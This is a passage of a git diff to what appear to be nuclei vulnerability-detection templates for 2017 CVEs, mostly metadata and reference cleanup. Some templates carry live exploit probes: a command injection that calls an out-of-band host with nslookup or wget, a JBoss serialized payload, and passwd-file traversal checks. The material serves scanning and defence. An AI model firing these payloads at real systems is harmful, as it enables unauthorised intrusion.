interactsh_protocol # Confirms the DNS interaction + part: interactsh_protocol # Confirms the DNS interaction words: - "dns" - type: status status: - - 500 \ No newline at end of file + - 500 + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2017/CVE-2017-10974.yaml b/cves/2017/CVE-2017-10974.yaml index 1e4cbc67c3..7b1821919c 100644 --- a/cves/2017/CVE-2017-10974.yaml +++ b/cves/2017/CVE-2017-10974.yaml @@ -8,6 +8,8 @@ info: reference: - https://www.exploit-db.com/exploits/42303 - https://nvd.nist.gov/vuln/detail/CVE-2017-10974 + - https://www.exploit-db.com/exploits/42303/ + - http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -15,7 +17,6 @@ info: cwe-id: CWE-22 tags: cve,cve2017,yaws,lfi - requests: - method: GET path: @@ -33,6 +34,4 @@ requests: - type: dsl dsl: - - '!contains(tolower(body), "supervisor.supervisord.options.warnings.linecache.os.system - wget http://{{interactsh-url}} + nslookup {{interactsh-url}} + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "http" + - "dns" + + - type: word + part: header + words: + - "text/xml" + + - type: word + part: body + words: + - "" + - "" + condition: and diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml old mode 100755 new mode 100644 index 8ead0e5c2a..869ca9180c --- a/cves/2017/CVE-2017-12149.yaml +++ b/cves/2017/CVE-2017-12149.yaml @@ -1,20 +1,21 @@ id: CVE-2017-12149 info: - name: Java/Jboss Deserialization [RCE] + name: Jboss Application Server - Remote Code Execution author: fopina severity: critical - description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data. + description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 - https://chowdera.com/2020/12/20201229190934023w.html - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 - tags: cve,cve2017,java,rce,deserialization + - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 + - https://bugzilla.redhat.com/show_bug.cgi?id=1486220 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-12149 cwe-id: CWE-502 + tags: cve,cve2017,jboss,java,rce,deserialization requests: - raw: @@ -24,6 +25,7 @@ requests: Content-Type: application/octet-stream {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} + - | POST /invoker/EJBInvokerServlet/ HTTP/1.1 Host: {{Hostname}} @@ -34,11 +36,13 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "ClassCastException" - part: body - type: word + part: header words: - "application/x-java-serialized-object" - part: header \ No newline at end of file + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml index e6b40b0d91..9bd0b6ab7e 100644 --- a/cves/2017/CVE-2017-12542.yaml +++ b/cves/2017/CVE-2017-12542.yaml @@ -1,38 +1,43 @@ id: CVE-2017-12542 info: - name: ILO4 Authentication bypass + name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass author: pikpikcu severity: critical - description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. + description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://www.exploit-db.com/exploits/44005 - tags: cve,cve2017,ilo4,hpe + - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 + - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us + - https://www.exploit-db.com/exploits/44005/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.00 + cvss-score: 10 cve-id: CVE-2017-12542 + tags: cve,cve2017,ilo4,hpe,auth-bypass requests: - method: GET path: - "{{BaseURL}}/rest/v1/AccountService/Accounts" + headers: Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA matchers-condition: and matchers: - type: word + part: body words: - "iLO User" - part: body - type: word + part: header words: - "application/json" - part: header - type: status status: - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-12544.yaml b/cves/2017/CVE-2017-12544.yaml index c6e8191672..db385e96b9 100644 --- a/cves/2017/CVE-2017-12544.yaml +++ b/cves/2017/CVE-2017-12544.yaml @@ -1,20 +1,22 @@ id: CVE-2017-12544 - -info: - name: HPE System Management - XSS - author: divya_mudgal - severity: medium - description: Reflected Cross-site scripting (XSS) on HPE System Management - reference: - - https://seclists.org/fulldisclosure/2018/Mar/5 - - https://nvd.nist.gov/vuln/detail/CVE-2017-12544 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2017-12544 - cwe-id: CWE-79 - tags: cve,cve2017,xss,hp - + +info: + name: HPE System Management - XSS + author: divya_mudgal + severity: medium + description: Reflected Cross-site scripting (XSS) on HPE System Management + reference: + - https://seclists.org/fulldisclosure/2018/Mar/5 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12544 + - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us + - http://www.securitytracker.com/id/1039437 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2017-12544 + cwe-id: CWE-79 + tags: cve,cve2017,xss,hp + requests: - method: GET path: diff --git a/cves/2017/CVE-2017-12583.yaml b/cves/2017/CVE-2017-12583.yaml new file mode 100644 index 0000000000..3fcc19e269 --- /dev/null +++ b/cves/2017/CVE-2017-12583.yaml @@ -0,0 +1,38 @@ +id: CVE-2017-12583 + +info: + name: Reflected XSS in doku.php + author: DhiyaneshDK + severity: medium + description: DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php. + reference: + - https://github.com/splitbrain/dokuwiki/issues/2061 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-12583 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"DokuWiki" + tags: cve,cve2017,xss,dokuwiki + +requests: + - method: GET + path: + - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Unable to parse at parameter "".' + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index d4f8d1050e..39a22529cf 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml @@ -1,17 +1,20 @@ id: CVE-2017-12611 info: - name: Apache Struts2 S2-053 RCE + name: Apache Struts2 S2-053 - Remote Code Execution author: pikpikcu severity: critical - description: In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack. - reference: https://struts.apache.org/docs/s2-053.html - tags: cve,cve2017,apache,rce,struts + description: Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks. + reference: + - https://struts.apache.org/docs/s2-053.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-12611 + - https://kb.netapp.com/support/s/article/ka51A000000CgttQAC/NTAP-20170911-0001 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-12611 cwe-id: CWE-20 + tags: cve,cve2017,apache,rce,struts requests: - method: POST @@ -23,8 +26,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml index 2c16f2c1fe..5d0fbb5cea 100644 --- a/cves/2017/CVE-2017-12615.yaml +++ b/cves/2017/CVE-2017-12615.yaml @@ -4,18 +4,22 @@ info: name: Apache Tomcat RCE author: pikpikcu severity: high - tags: cve,cve2017,apache,rce - reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 description: | By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. + reference: + - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 + - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E + - http://www.securitytracker.com/id/1039392 + - http://www.securityfocus.com/bid/100901 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2017-12615 cwe-id: CWE-434 + tags: cve,cve2017,apache,rce,tomcat requests: - method: PUT @@ -48,8 +52,8 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" - part: body + - "root:.*:0:0:" + - type: status status: - 200 diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml index bcfeceeb5f..ea0227d45b 100644 --- a/cves/2017/CVE-2017-12629.yaml +++ b/cves/2017/CVE-2017-12629.yaml @@ -1,21 +1,21 @@ id: CVE-2017-12629 info: - name: Apache Solr <= 7.1 XML entity injection + name: Apache Solr <= 7.1 - XML Entity Injection author: dwisiswant0 severity: critical - tags: cve,cve2017,solr,apache,oast,xxe + description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 - https://twitter.com/honoki/status/1298636315613974532 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE + - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-12629 cwe-id: CWE-611 - description: "Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr." + tags: cve,cve2017,solr,apache,oast,xxe requests: - raw: @@ -29,7 +29,7 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" @@ -39,4 +39,6 @@ requests: name: core group: 1 regex: - - '"name"\:"(.*?)"' \ No newline at end of file + - '"name"\:"(.*?)"' + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml index 7e7edb5586..2999c299a2 100644 --- a/cves/2017/CVE-2017-12635.yaml +++ b/cves/2017/CVE-2017-12635.yaml @@ -1,17 +1,21 @@ id: CVE-2017-12635 info: - name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 Remote Privilege Escalation + name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation author: pikpikcu severity: critical - description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. - reference: https://github.com/assalielmehdi/CVE-2017-12635 - tags: cve,cve2017,couchdb + description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-12635 + - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E + - http://www.securityfocus.com/bid/101868 + - https://security.gentoo.org/glsa/201711-16 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-12635 cwe-id: CWE-269 + tags: cve,cve2017,couchdb,apache requests: - raw: @@ -31,19 +35,21 @@ requests: matchers-condition: and matchers: - type: word + part: header words: - "application/json" - "Location:" - part: header - type: word + part: body words: - "org.couchdb.user:poc" - "conflict" - "Document update conflict" - part: body - type: status status: - 201 - 409 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml index 905e10391a..572bcf7a8c 100644 --- a/cves/2017/CVE-2017-12637.yaml +++ b/cves/2017/CVE-2017-12637.yaml @@ -5,16 +5,17 @@ info: author: apt-mirror severity: high description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. - tags: cve,cve2017,sap,lfi reference: - https://www.cvedetails.com/cve/CVE-2017-12637/ - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf + - http://www.sh0w.top/index.php/archives/7/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-12637 cwe-id: CWE-22 + tags: cve,cve2017,sap,lfi,java,traversal requests: - method: GET diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml index ad1ea847cc..02b2f66ae2 100644 --- a/cves/2017/CVE-2017-12794.yaml +++ b/cves/2017/CVE-2017-12794.yaml @@ -1,20 +1,22 @@ id: CVE-2017-12794 info: - name: Django debug page XSS + name: Django Debug Page - Cross-Site Scripting author: pikpikcu severity: medium + description: | + Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). reference: - https://twitter.com/sec715/status/1406779605055270914 - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - description: | - In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. - tags: xss,django,cve,cve2017 + - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ + - http://www.securitytracker.com/id/1039264 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-12794 cwe-id: CWE-79 + tags: xss,django,cve,cve2017 requests: - method: GET @@ -36,3 +38,5 @@ requests: words: - "text/html" part: header + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-14135.yaml b/cves/2017/CVE-2017-14135.yaml new file mode 100644 index 0000000000..3f7e57637b --- /dev/null +++ b/cves/2017/CVE-2017-14135.yaml @@ -0,0 +1,46 @@ +id: CVE-2017-14135 + +info: + name: OpenDreambox 2.0.0 - Remote Code Execution + author: alph4byt3 + severity: critical + description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py. + reference: + - https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/ + - https://www.exploit-db.com/exploits/42293 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14135 + - https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-14135 + cwe-id: CWE-78 + metadata: + shodan-query: title:"Dreambox WebControl" + tags: cve,cve2017,dreambox,rce,oast + +requests: + - raw: + - | + GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "/bin/sh" + - "/usr/script" + condition: and + + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml index a9b3be6385..b116743885 100644 --- a/cves/2017/CVE-2017-14535.yaml +++ b/cves/2017/CVE-2017-14535.yaml @@ -1,19 +1,21 @@ id: CVE-2017-14535 info: - name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability + name: Trixbox - 2.8.0.4 OS Command Injection author: pikpikcu severity: high + description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. reference: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 - tags: cve,cve2017,trixbox,rce + - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 + - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2017-14535 cwe-id: CWE-78 - description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." + tags: cve,cve2017,trixbox,rce,injection requests: - raw: @@ -31,8 +33,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/04/01 diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index 03689a2002..66f9cfe5ba 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -1,20 +1,20 @@ id: CVE-2017-14537 info: - name: trixbox 2.8.0 - directory-traversal + name: Trixbox 2.8.0 - Path Traversal author: pikpikcu severity: medium - tags: cve,cve2017,trixbox,lfi - description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. + description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - - https://sourceforge.net/projects/asteriskathome/ # vendor homepage + - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 + - https://sourceforge.net/projects/asteriskathome/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2017-14537 cwe-id: CWE-22 + tags: cve,cve2017,trixbox,lfi requests: - raw: @@ -47,3 +47,5 @@ requests: regex: - "root:.*:0:0:" part: body + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-14651.yaml b/cves/2017/CVE-2017-14651.yaml index 91fc63e9f3..401d1e3040 100644 --- a/cves/2017/CVE-2017-14651.yaml +++ b/cves/2017/CVE-2017-14651.yaml @@ -1,20 +1,21 @@ id: CVE-2017-14651 info: - name: Reflected XSS - WSO2 Data Analytics Server + name: WSO2 Data Analytics Server 3.1.0 - Reflected Cross-Site Scripting author: mass0ma severity: medium - description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. - tags: cve,cve2017,wso2,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.80 - cve-id: CVE-2017-14651 - cwe-id: CWE-79 + description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. reference: - https://github.com/cybersecurityworks/Disclosed/issues/15 - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265 - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-14651 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2017-14651 + cwe-id: CWE-79 + tags: cve,cve2017,wso2,xss requests: - method: GET @@ -34,4 +35,6 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header + +# Enhanced by mp on 2022/04/14 diff --git a/cves/2017/CVE-2017-14849.yaml b/cves/2017/CVE-2017-14849.yaml index 6a386ab381..87a14fe679 100644 --- a/cves/2017/CVE-2017-14849.yaml +++ b/cves/2017/CVE-2017-14849.yaml @@ -5,16 +5,16 @@ info: author: Random_Robbie severity: high description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules. - tags: cve,cve2017,nodejs,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2017-14849 - cwe-id: CWE-22 reference: - https://twitter.com/nodejs/status/913131152868876288 - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ - http://www.securityfocus.com/bid/101056 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-14849 + cwe-id: CWE-22 + tags: cve,cve2017,nodejs,lfi requests: - method: GET diff --git a/cves/2017/CVE-2017-15287.yaml b/cves/2017/CVE-2017-15287.yaml new file mode 100644 index 0000000000..144181dec3 --- /dev/null +++ b/cves/2017/CVE-2017-15287.yaml @@ -0,0 +1,32 @@ +id: CVE-2017-15287 + +info: + name: Dreambox WebControl 2.0.0 - Cross-Site Scripting + author: pikpikcu + severity: medium + description: | + Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI. + reference: + - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf + - https://www.exploit-db.com/exploits/42986/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-15287 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-15287 + cwe-id: CWE-79 + tags: cve,cve2017,xss,dreambox + +requests: + - raw: + - | + GET /webadmin/pkg?command= HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: word + words: + - 'Unknown command: ' + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-15363.yaml b/cves/2017/CVE-2017-15363.yaml index aafe16b2b5..2847c25a96 100644 --- a/cves/2017/CVE-2017-15363.yaml +++ b/cves/2017/CVE-2017-15363.yaml @@ -1,17 +1,20 @@ id: CVE-2017-15363 + info: - name: Typo3 Restler Extension - Local File Disclosure + name: TYPO3 Restler - Arbitrary File Retrieval author: 0x_Akoko severity: high description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter. reference: - https://www.exploit-db.com/exploits/42985 - https://www.cvedetails.com/cve/CVE-2017-15363 + - https://extensions.typo3.org/extension/restler/ + - https://extensions.typo3.org/extension/download/restler/1.7.1/zip/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-15363 - cwe-id: CWE-98 + cwe-id: CWE-22 tags: cve,cve2017,restler,lfi requests: diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml index 57a6eda186..eb06edfa05 100644 --- a/cves/2017/CVE-2017-15647.yaml +++ b/cves/2017/CVE-2017-15647.yaml @@ -8,12 +8,13 @@ info: reference: - https://www.exploit-db.com/exploits/44054 - https://www.cvedetails.com/cve/CVE-2017-15647 - tags: cve,cve2017,lfi,router + - https://blogs.securiteam.com/index.php/archives/3472 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-15647 cwe-id: CWE-22 + tags: cve,cve2017,lfi,router requests: - method: GET @@ -25,7 +26,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml index 2a2853e552..9bdb3d8f37 100644 --- a/cves/2017/CVE-2017-15715.yaml +++ b/cves/2017/CVE-2017-15715.yaml @@ -3,15 +3,19 @@ id: CVE-2017-15715 info: name: Apache Arbitrary File Upload author: geeknik - description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename. - reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 severity: high - tags: cve,cve2017,apache,httpd,fileupload + description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename. + reference: + - https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 + - https://httpd.apache.org/security/vulnerabilities_24.html + - http://www.openwall.com/lists/oss-security/2018/03/24/6 + - http://www.securitytracker.com/id/1040570 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2017-15715 cwe-id: CWE-20 + tags: cve,cve2017,apache,httpd,fileupload requests: - raw: diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index 48553abee3..ffbe9d78c8 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -1,16 +1,18 @@ id: CVE-2017-15944 info: - name: PreAuth RCE on Palo Alto GlobalProtect + name: Palo Alto Network PAN-OS - Remote Code Execution author: 